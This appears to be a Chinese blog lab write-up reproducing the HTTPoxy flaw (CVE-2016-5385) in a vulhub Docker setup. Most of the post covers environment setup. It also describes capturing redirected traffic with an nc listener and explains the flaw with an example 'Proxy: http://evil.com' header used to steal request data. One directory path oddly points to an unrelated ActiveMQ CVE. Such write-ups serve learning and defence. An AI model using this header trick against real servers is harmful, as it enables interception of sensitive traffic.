CVE-2016-5385

作者: 3mi1e | 来源:发表于2019-07-24 20:34 被阅读196次

    HTTPoxy漏洞(CVE-2016-5385)

    1.漏洞影响版本

    vulhub中的环境使用的是php
    受影响的php版本:
    PHP 5.5.37
    PHP 5.6.23
    PHP 7.0.8
    CVE-2016-5385详情信息

    2.漏洞危害

    重定向HTTP数据到任意代理服务器

    3.漏洞POC

    不用梯子,添加如下内容到Dockerfile中,否则dockerfile中有apt-get update使用Ubuntu官方源,特别慢或者出错

    RUN mv /etc/apt/sources.list /etc/apt/sources.list.bak && \
    echo 'deb http://mirrors.163.com/debian/ jessie main non-free contrib' > /etc/apt/sources.list && \
    echo 'deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib' >> /etc/apt/sources.list && \
    echo 'deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib' >> /etc/apt/sources.list
    
    部署虚拟机
    cd /root/vulhub/activemq/CVE-2016-3088              ////进入本次复现的vulhub目录
    docker-compose build        
    

    取出dockerfile中的最后两行

    Dockerfile

    进入刚才编译好的docker环境
    docker ps -a
    docker start CONTANER ID
    docker exec -it CONTANER ID /bin/bash

    安装composer

    依次执行如下命令

    composer config -g repo.packagist composer https://packagist.phpcomposer.com
    composer install 
    composer update
    apt-get purge -y --auto-remove wget zip unzip
    
    docker-compose up -d                            ////docker-compose搭建nginx环境
    

    正常如果是公网服务器,Host与Origin应该是相同的

    直接访问页面

    使用nc监听端口,添加监听机的Proxy:IP,接受重定向的http数据

    获取origin被修改期间的http数据
    4.复盘

    漏洞出现原因
    简单来说,根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com,进而窃取数据包中可能存在的敏感信息。
    总结
    1.Debian不是Ubuntu。
    2.第一次被更新源限制了,但是找到了解决办法,修改Debian更新源,修改Composer下载源。

    相关文章

      网友评论

        本文标题:CVE-2016-5385

        本文链接:https://www.haomeiwen.com/subject/izgfrctx.html